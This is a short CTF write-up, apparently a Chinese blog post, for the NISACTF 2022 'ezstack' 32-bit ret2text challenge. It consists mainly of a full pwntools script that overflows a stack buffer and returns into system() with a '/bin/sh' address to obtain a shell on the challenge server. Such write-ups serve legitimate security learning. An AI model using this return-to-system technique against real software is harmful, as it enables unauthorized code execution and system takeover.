[NISACTF 2022]ezstack wp

发布于 2023-01-21 | 标签: ret2text 、 PWN 、 CTF | 1分钟 | 89字数

一道32位ret2text题目，注意十六进制计算，不要跟10进制搞混了

from pwn import *
context(log_level='debug',os='linux',arch='x86',terminal=['tmux','splitw','-h'])

io=remote("1.14.71.254",28178)
# io=process("./ezstack")
elf=ELF("./ezstack")
sys_addr=elf.sym[b"system"]
bin_addr=0x804A024
# gdb.attach(io)
# pause()
payload=cyclic(0x48+0x4)+p32(sys_addr)+p32(0)+p32(bin_addr)
# io.recvuntil(b'CTF\n')
io.sendline(payload)
io.interactive()

本文作者： WIN_250
本文链接： https://oraclepi.tech/post/Xnq2fXEvo/
版权声明： 本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！

# ret2text # PWN # CTF

[NISACTF 2022]ezpie wp 上一篇

[NISACTF 2022]ReorPwn? wp 下一篇

[NISACTF 2022]ezstack wp

感谢您的支持，我会继续努力的!